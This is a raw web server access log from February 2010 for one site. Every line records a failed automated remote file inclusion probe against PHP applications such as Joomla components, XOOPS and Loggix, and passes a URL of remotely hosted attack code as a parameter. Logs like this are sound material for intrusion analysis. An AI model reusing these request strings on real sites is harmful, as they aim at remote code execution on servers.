74.50.85.229 - - [18/Feb/2010:07:14:05 -0800] "GET /logs/access_100211.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:05 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:05 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:13 -0800] "GET /logs/access_100120.log%20%20///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:47 -0800] "GET /administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:47 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:47 -0800] "GET /logs//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:14:48 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:14:48 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:14:48 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:51 -0800] "GET /administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:51 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:51 -0800] "GET /logs//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:51 -0800] "GET /logs/access_100211.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:51 -0800] "GET /logs///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:51 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:52 -0800] "GET /administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:52 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:14:52 -0800] "GET /logs//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [18/Feb/2010:07:14:56 -0800] "GET /logs/access_100120.log///components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.radek-mx.pl//news/data/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:15:04 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:15:04 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:15:04 -0800] "GET /logs/access_100204.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:15:44 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:15:44 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:15:45 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:16:26 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:16:26 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:16:26 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:16:29 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:16:30 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:16:30 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:17:27 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:17:29 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:17:29 -0800] "GET /logs/access_100114.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:17:29 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:17:33 -0800] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:17:33 -0800] "GET /logs/access_100114.log%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:17:33 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:17:44 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:17:44 -0800] "GET /logs/access_100204.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:17:45 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:18:14 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:18:14 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:18:23 -0800] "GET /logs/access_100121.log//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:18:23 -0800] "GET /logs/access_100123.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:18:26 -0800] "GET ///components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:18:26 -0800] "GET /logs////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:18:26 -0800] "GET /logs/access_100127.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:18:47 -0800] "GET /logs/access_100115.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:18:47 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:18:47 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:18:49 -0800] "GET /logs////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:18:49 -0800] "GET ///components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:18:49 -0800] "GET /logs/access_100127.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:18:51 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:19:06 -0800] "GET /logs/access_100123.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:19:06 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:19:06 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:19:54 -0800] "GET /logs/access_100127.log%20%20////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:20:07 -0800] "GET /logs/access_100127.log%20%20////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:20:45 -0800] "GET /logs/access_100111.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:20:46 -0800] "GET /logs/access_100107.log%20%20////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:20:58 -0800] "GET /logs/access_100107.log%20%20////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:21:14 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:21:15 -0800] "GET /logs/access_100204.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:21:15 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:21:16 -0800] "GET /logs/access_100123.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:21:37 -0800] "GET /logs/access_100113.log//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:21:45 -0800] "GET /logs/access_100115.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
203.124.149.168 - - [18/Feb/2010:07:21:46 -0800] "GET /logs/access_100123.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:21:46 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:21:47 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:21:47 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:21:55 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:22:54 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:07:23:08 -0800] "GET /logs/access_100121.log//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:24:29 -0800] "GET ///components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:24:29 -0800] "GET /logs/access_100127.log%20%20////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:24:29 -0800] "GET /logs////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:24:30 -0800] "GET /logs/access_100127.log%20%20////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:24:30 -0800] "GET /logs////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:24:30 -0800] "GET ///components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:24:42 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:24:42 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:24:42 -0800] "GET /logs/access_100123.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [18/Feb/2010:07:24:52 -0800] "GET /logs/access_100105.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:25:01 -0800] "GET /logs/access_100111.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:25:11 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:25:11 -0800] "GET /logs/access_100123.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:25:11 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:25:17 -0800] "GET /logs/access_100111.log%20%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:25:20 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:25:22 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.98.144.18 - - [18/Feb/2010:07:25:45 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://www.ktacademy.co.kr/flash/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:25:52 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:25:58 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:26:37 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:26:37 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:26:37 -0800] "GET /logs/access_100208.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:26:37 -0800] "GET /logs/access_100107.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:13 -0800] "GET /logs/access_100127.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:32 -0800] "GET /logs/access_100107.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:42 -0800] "GET /logs/access_100127.log////components/com_RWCards/RWCards.php?msConfig.absolute.path=http://dongja.booktobi.com//attic/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [18/Feb/2010:07:27:47 -0800] "GET /logs/access_100125.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://80.59.61.12/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:47 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:07:27:47 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
